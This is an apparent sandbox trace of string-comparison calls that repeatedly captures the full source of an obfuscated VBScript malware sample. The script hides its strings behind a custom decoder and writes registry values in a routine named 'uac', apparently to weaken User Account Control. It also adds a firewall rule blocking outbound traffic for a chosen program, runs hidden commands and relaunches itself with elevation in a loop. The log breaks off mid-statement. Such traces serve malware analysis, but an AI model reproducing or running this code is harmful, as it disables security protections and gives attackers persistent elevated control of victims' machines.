bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.350] wcsncmp (_String1="ules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.350] wcsncmp (_String1="les.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.350] wcsncmp (_String1="es.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.351] wcsncmp (_String1="s.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.351] wcsncmp (_String1=".Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), 